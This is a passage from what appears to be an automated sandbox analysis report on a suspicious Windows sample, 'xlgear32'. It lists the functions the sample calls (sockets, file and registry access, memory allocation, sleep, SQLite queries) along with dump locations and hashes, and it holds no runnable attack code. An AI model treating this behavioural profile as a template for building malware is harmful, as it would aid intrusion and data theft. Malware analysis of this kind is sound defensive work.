                                                                            • Part of subcall function 02D93D7E: htonl.WS2_32(00000000), ref: 02D93DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonl$H_prologhtons
                                                                          • String ID:
                                                                          • API String ID: 4039807196-0
                                                                          • Opcode ID: 23e82597d14e33d6fe6d50509bcb76cb4c1ef993289fa26e50f9dbac9bcf7f71
                                                                          • Instruction ID: c79a961bf6aa47b93b83547b4d583bca3cfb44017d7e95053e08f0213e5ebd79
                                                                          • Opcode Fuzzy Hash: 23e82597d14e33d6fe6d50509bcb76cb4c1ef993289fa26e50f9dbac9bcf7f71
                                                                          • Instruction Fuzzy Hash: CF811775D0424A8ECF06DFA8E590AEEBBB5EF48214F10816AE851B7340EB765E05CF74
                                                                          Function 02DDA6EA Relevance: 1.6, APIs: 1, Instructions: 126fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 4279a992d83b44a2e96cb340aacb0e071a1b4da6028500d571e431b1f5cdf534
                                                                          • Instruction ID: fd7417bf197a56d4faf6ce23cc9f7073f52728074670db87e43eef8448b25924
                                                                          • Opcode Fuzzy Hash: 4279a992d83b44a2e96cb340aacb0e071a1b4da6028500d571e431b1f5cdf534
                                                                          • Instruction Fuzzy Hash: C44131F150C204AFE7156F09EC81B7EBBE8EF58714F06492DE7C583340E63668508A97
                                                                          Function 02DCFD3B Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: a943048851269d26c9bab0633ce003f790670846f77d66ef91684f795a00eb4d
                                                                          • Instruction ID: 4cb99202c2a347636a6da898d043f0bc40c4aa87a1931e48929950ba52d662e5
                                                                          • Opcode Fuzzy Hash: a943048851269d26c9bab0633ce003f790670846f77d66ef91684f795a00eb4d
                                                                          • Instruction Fuzzy Hash: F231E4F250C604AFE701BF19E885B7ABBE4EF54210F06492DE6C486700E636A854CB97
                                                                          Function 02D9E9C1 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9E9C6
                                                                            • Part of subcall function 02D91A01: TlsGetValue.KERNEL32 ref: 02D91A0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologValue
                                                                          • String ID:
                                                                          • API String ID: 3700342317-0
                                                                          • Opcode ID: c061340fc1ffd9397dc8457eb5b4e04ab4ebd4115446526a5c71cf2e6dfca7d9
                                                                          • Instruction ID: d05b91f3ad246e095316268f824886f18d2806347064d09a8ffea107906a9197
                                                                          • Opcode Fuzzy Hash: c061340fc1ffd9397dc8457eb5b4e04ab4ebd4115446526a5c71cf2e6dfca7d9
                                                                          • Instruction Fuzzy Hash: 69211BB1904209AFDF04DFA4D540AEEBBF9FF49310F14411AE915A7340E771AD01CBA5
                                                                          Function 02DD3769 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 50d038042ea2c4935370e3ca81c390e64a2fbfca27dbf92160fe7fdd3c08c324
                                                                          • Instruction ID: 44b26506712acb51df5a8eb610016e9b0d5cb39a993df57c19a9bdeef6fd7d86
                                                                          • Opcode Fuzzy Hash: 50d038042ea2c4935370e3ca81c390e64a2fbfca27dbf92160fe7fdd3c08c324
                                                                          • Instruction Fuzzy Hash: 32116AF250CA14DBD311BF69D88577AFBE8EF48341F16091EDAD097640D67118848B97
                                                                          Function 02D933B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D933CC
                                                                            • Part of subcall function 02D932AB: __EH_prolog.LIBCMT ref: 02D932B0
                                                                            • Part of subcall function 02D932AB: RtlEnterCriticalSection.NTDLL(?), ref: 02D932C3
                                                                            • Part of subcall function 02D932AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D932EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1518410164-0
                                                                          • Opcode ID: 2e2ac5098e0543198fe9814890d0ad4aadad4a8d1777617b21d4f38baeef779d
                                                                          • Instruction ID: cacbc79bdaa1ad9cf0f84b6d23289a7f0d0839ed8401fec1becc800c5abba0cd
                                                                          • Opcode Fuzzy Hash: 2e2ac5098e0543198fe9814890d0ad4aadad4a8d1777617b21d4f38baeef779d
                                                                          • Instruction Fuzzy Hash: 7D012D71654606AFDB049F59D885B55BBA9FF49320F10835AF868873C0EB70ED21CBA4
                                                                          Function 02DE5E00 Relevance: 1.6, APIs: 1, Instructions: 50fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 970e9f69bec3359f119859299074b3b06d462244b0d05b5a1fd4d985648813c7
                                                                          • Instruction ID: 2d6e82c73f1ccf03afcdb7d036e401a1aefd2f3abac8b17d9f136c69b772a6c3
                                                                          • Opcode Fuzzy Hash: 970e9f69bec3359f119859299074b3b06d462244b0d05b5a1fd4d985648813c7
                                                                          • Instruction Fuzzy Hash: 240113F244C618EFE7117F09EC857BABBE4EF44761F02081DE6C046600EA315844CB9B
                                                                          Function 00402BFD Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c8b752a95ec8001cdb7d634afe3e3089ae3aa72283ad494e1486f240dac33569
                                                                          • Instruction ID: 4c4bced84a15559e84380ca9cb6a06561af7595c41b9be24f35168943475007a
                                                                          • Opcode Fuzzy Hash: c8b752a95ec8001cdb7d634afe3e3089ae3aa72283ad494e1486f240dac33569
                                                                          • Instruction Fuzzy Hash: 07F0E921E4C145E9E61725F05F0C5692F209D67380339557BD893B16D0E9BE884FA29F
                                                                          Function 02D9E551 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9E556
                                                                            • Part of subcall function 02D926DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D92706
                                                                            • Part of subcall function 02D926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D9272B
                                                                            • Part of subcall function 02D926DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DB5B53), ref: 02D92738
                                                                            • Part of subcall function 02D926DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D92778
                                                                            • Part of subcall function 02D926DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D927D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID:
                                                                          • API String ID: 4293676635-0
                                                                          • Opcode ID: 4e238c980787d8b344e801aff4792050718008315ae0b8a05a433932b8ec601e
                                                                          • Instruction ID: 23dbc3dd8898ef5f0c992005aa643adc766a84ea9624279eeeb78368702bf8b4
                                                                          • Opcode Fuzzy Hash: 4e238c980787d8b344e801aff4792050718008315ae0b8a05a433932b8ec601e
                                                                          • Instruction Fuzzy Hash: 9C01DCB4900B04DFC719CF1AC64498AFBF5EF88700B15C6AE944A8B721E770EA40CFA0
                                                                          Function 02DF020B Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 02E2C6F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPathSpecial
                                                                          • String ID:
                                                                          • API String ID: 994120019-0
                                                                          • Opcode ID: 7f038540116fa8564e045d42b1eaae522119dbf2b9efa41a8dffae74188cd979
                                                                          • Instruction ID: 44582a98a7c0a411b5983796e52fcbc40f8476900d9424943ca3a519b8352888
                                                                          • Opcode Fuzzy Hash: 7f038540116fa8564e045d42b1eaae522119dbf2b9efa41a8dffae74188cd979
                                                                          • Instruction Fuzzy Hash: CDE0E5B248C7188FE3013E58FC957F9B7E4DB04260F05583DC7C282300E67198408AC7
                                                                          Function 02DD36BC Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: a13e047478bd8a6a42dc18cd0547f10866faa3ed0a4c43cb17f54e713b12e739
                                                                          • Instruction ID: e6ecf3aac4c6162e2361db1869ec8518039325d410faadb1dfd285144a9866fc
                                                                          • Opcode Fuzzy Hash: a13e047478bd8a6a42dc18cd0547f10866faa3ed0a4c43cb17f54e713b12e739
                                                                          • Instruction Fuzzy Hash: A8E0B6B148C6089BEB2A7A09DC8177DB3E4AF14740F46482C9BD243390F9356860CADB
                                                                          Function 02D9E330 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9E335
                                                                            • Part of subcall function 02DA3B4C: _malloc.LIBCMT ref: 02DA3B64
                                                                            • Part of subcall function 02D9E551: __EH_prolog.LIBCMT ref: 02D9E556
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_malloc
                                                                          • String ID:
                                                                          • API String ID: 4254904621-0
                                                                          • Opcode ID: ce4750045d6a268a38653e261c07822e3d05f0ff43c8a6aef5239d92cdf6007f
                                                                          • Instruction ID: 18039e08c142749f1f6a948e6bf6e2ad8d2af5a486ba7b60d8d359c84aa20f25
                                                                          • Opcode Fuzzy Hash: ce4750045d6a268a38653e261c07822e3d05f0ff43c8a6aef5239d92cdf6007f
                                                                          • Instruction Fuzzy Hash: 18E0CD71A11105ABCF4DDF98D81076D77A6EF04700F00416EB80ED2340DF70DD008A54
                                                                          Function 02DA3452 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 02DA5C5A: __getptd_noexit.LIBCMT ref: 02DA5C5B
                                                                            • Part of subcall function 02DA5C5A: __amsg_exit.LIBCMT ref: 02DA5C68
                                                                            • Part of subcall function 02DA3493: __getptd_noexit.LIBCMT ref: 02DA3497
                                                                            • Part of subcall function 02DA3493: __freeptd.LIBCMT ref: 02DA34B1
                                                                            • Part of subcall function 02DA3493: RtlExitUserThread.NTDLL(?,00000000,?,02DA3473,00000000), ref: 02DA34BA
                                                                          • __XcptFilter.LIBCMT ref: 02DA347F
                                                                            • Part of subcall function 02DA8D94: __getptd_noexit.LIBCMT ref: 02DA8D98
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                          • String ID:
                                                                          • API String ID: 1405322794-0
                                                                          • Opcode ID: 2a044c1f968add674bba766a00d7facb4f50a519bf2923733d3bc24f5d0e458e
                                                                          • Instruction ID: 5eaaf033721b22cde4119292bfec44b2d5e98e039382bcc4a946e519219e3410
                                                                          • Opcode Fuzzy Hash: 2a044c1f968add674bba766a00d7facb4f50a519bf2923733d3bc24f5d0e458e
                                                                          • Instruction Fuzzy Hash: 38E0ECB1D446019FEB08BBA0E859F2D7766EF04701F200488E502AB361CA74AD40AE30
                                                                          Function 00402A23 Relevance: 1.5, APIs: 1, Instructions: 17registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNEL32(80000002), ref: 00402A31
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: aed91c5e2db4a472a327caa05b34cb2312bccbeb60dbe7524a7475a69a87eb61
                                                                          • Instruction ID: 391140d39f6363fe9284a6718c49bea0c34dcd7bfdddc889766891a5dfeac042
                                                                          • Opcode Fuzzy Hash: aed91c5e2db4a472a327caa05b34cb2312bccbeb60dbe7524a7475a69a87eb61
                                                                          • Instruction Fuzzy Hash: 07E01271908115DAD7458BE0D944AFFBBB86B25304F61047BE843F61C0D77C964EA72B
                                                                          Function 00402CF3 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: c51f7133d245e36b5ef68ca67cde452df16776778f160017d81fa19080902b6f
                                                                          • Instruction ID: 34a393598c5a1eb56d4e5581fcee354bef605b3b3ba2ff18e136e76798c667a3
                                                                          • Opcode Fuzzy Hash: c51f7133d245e36b5ef68ca67cde452df16776778f160017d81fa19080902b6f
                                                                          • Instruction Fuzzy Hash: DAB0123128D011E7C0011A405E09EAB502C4A0A38032040367102700C145FC0506967E
                                                                          Function 004022BC Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 6387ede01eaef290c7160cd8943e2673a27ec9d3c9851565785a920c4f73f209
                                                                          • Instruction ID: 6c57ee3b2b08538006332e2037b2a6fcaff609d84994734356c29db49792d02c
                                                                          • Opcode Fuzzy Hash: 6387ede01eaef290c7160cd8943e2673a27ec9d3c9851565785a920c4f73f209
                                                                          • Instruction Fuzzy Hash: F4B09235C49401E6C64227C04A48D697A306A193007208233E207300D086F8A80AB71F
                                                                          Function 0040D39B Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExA.KERNEL32(?,00000000), ref: 0040D3A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 398fab2d751ecfb93693a12abff0b36310409ed9291769b6af3f87ac72a9328e
                                                                          • Instruction ID: 28214bcbb3204342a1b1f4a26b6896509a4363b8035d439ea7a8080bfcacd4a6
                                                                          • Opcode Fuzzy Hash: 398fab2d751ecfb93693a12abff0b36310409ed9291769b6af3f87ac72a9328e
                                                                          • Instruction Fuzzy Hash: EFC09B34500215DFDB408F64DD44B593BF4BF04740F100535E405E5190D77195019B45
                                                                          Function 00402C93 Relevance: 1.5, APIs: 1, Instructions: 6registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3356406503-0
                                                                          • Opcode ID: 7ec1c664a2ff187a57ef4d7fc890f787bd0a258d4d21fd0839bc39abadf81a67
                                                                          • Instruction ID: bc27b3751eb719869b73d4606e9b78e87f1238a5196a18b0f5264eb26db53955
                                                                          • Opcode Fuzzy Hash: 7ec1c664a2ff187a57ef4d7fc890f787bd0a258d4d21fd0839bc39abadf81a67
                                                                          • Instruction Fuzzy Hash: E5B012103042029DC6210D700B0C223104015047803150C3F5C43F11D0D67C8006201D
                                                                          Function 00402C74 Relevance: 1.5, APIs: 1, Instructions: 3fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID:
                                                                          • API String ID: 1304948518-0
                                                                          • Opcode ID: 4697c56c58a4b9bfec89be4aa9e287f240d21a00262414fb0488fa3d69077895
                                                                          • Instruction ID: 7a955f6cc2f1f8e80166588b3dfc88a9658cf8b8bf31edb41406b191a7f20c8d
                                                                          • Opcode Fuzzy Hash: 4697c56c58a4b9bfec89be4aa9e287f240d21a00262414fb0488fa3d69077895
                                                                          • Instruction Fuzzy Hash: 1D9002303045419AD2000E215F5C615377855446C535544796447F0094DA7490496519
                                                                          Function 02DA2160 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 02DA1610: OpenEventA.KERNEL32(00100002,00000000,00000000,7CC1903D), ref: 02DA16B0
                                                                            • Part of subcall function 02DA1610: CloseHandle.KERNEL32(00000000), ref: 02DA16C5
                                                                            • Part of subcall function 02DA1610: ResetEvent.KERNEL32(00000000,7CC1903D), ref: 02DA16CF
                                                                            • Part of subcall function 02DA1610: CloseHandle.KERNEL32(00000000,7CC1903D), ref: 02DA1704
                                                                          • TlsSetValue.KERNEL32(00000029,?), ref: 02DA21AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$OpenResetValue
                                                                          • String ID:
                                                                          • API String ID: 1556185888-0
                                                                          • Opcode ID: ccc1e1ed6afafa902bc84bf29fcc8a51a368cc22503c46dae4c2929f894cd9cc
                                                                          • Instruction ID: 2734cd0ab09c7f41785e9f005c6f124ac537ebf6272796956e229896d4b9d692
                                                                          • Opcode Fuzzy Hash: ccc1e1ed6afafa902bc84bf29fcc8a51a368cc22503c46dae4c2929f894cd9cc
                                                                          • Instruction Fuzzy Hash: 48018F76A44204EBD700CF69DC45F9ABBA8EB05671F204B6AF825D3780D731AD148AA0
                                                                          Function 0040D801 Relevance: 1.3, APIs: 1, Instructions: 19stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 1586166983-0
                                                                          • Opcode ID: 1d628e66bcc2136491b692bc82bf371a75d1b94ed9b58e3e12234206875eb839
                                                                          • Instruction ID: 69e9af10a6a7a0042301cde8c881ff7366d1b1b249570328560fe19bc8a80875
                                                                          • Opcode Fuzzy Hash: 1d628e66bcc2136491b692bc82bf371a75d1b94ed9b58e3e12234206875eb839
                                                                          • Instruction Fuzzy Hash: D1D01731A0411ADBE7089EB1AE945BD3674AA08B92325043FE403B51D1DBBC6A0AA51E
                                                                          Function 0040D556 Relevance: 1.3, APIs: 1, Instructions: 10sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 1d73d17cf86509b83ffb441e6e13f17a0f9e4f0bc6d37178257e2431527e7a42
                                                                          • Instruction ID: 0a3c44f9156613cf0c39df5419219f0d6b6772f92975047c21adf9bf8be382d1
                                                                          • Opcode Fuzzy Hash: 1d73d17cf86509b83ffb441e6e13f17a0f9e4f0bc6d37178257e2431527e7a42
                                                                          • Instruction Fuzzy Hash: 8DC08C30908B00EBEB042BE4DE08C283734AB08300B210126F14AE20D0CB38AA09BA9F
                                                                          Function 0040D00D Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 5c9b3484a0c039218701f8b7e1abcbf0824f7a77f3ef670c2a72dadcf6225890
                                                                          • Instruction ID: ed451d5caee5ef4bbc53c0c8780dddc3fc23dc65a6d1a240ab572ba9267a686c
                                                                          • Opcode Fuzzy Hash: 5c9b3484a0c039218701f8b7e1abcbf0824f7a77f3ef670c2a72dadcf6225890
                                                                          • Instruction Fuzzy Hash: 01B01235800111DFC7028F608B0805CBFB0B70C300711007AE541B2250C7B41528DBC4
                                                                          Function 0040D320 Relevance: 1.3, APIs: 1, Instructions: 3sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 070fe0ec7119d6e58c8b8ef7b82ced6643895955a2a818063bb7b844bcb2afb2
                                                                          • Instruction ID: 0f329c160bda7ad3ba111d186c9c71302f7af56df08d4ba4299fae2684aac1c0
                                                                          • Opcode Fuzzy Hash: 070fe0ec7119d6e58c8b8ef7b82ced6643895955a2a818063bb7b844bcb2afb2
                                                                          • Instruction Fuzzy Hash: 48900231544900B6D14006606B0DF1435216348701F5101266742680D049B50045560E

                                                                          Non-executed Functions

                                                                          Function 6096748C Relevance: 131.0, APIs: 72, Strings: 2, Instructions: 1504COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                            • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                          • sqlite3_step.SQLITE3 ref: 6096755A
                                                                          • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                          • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                          • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967950
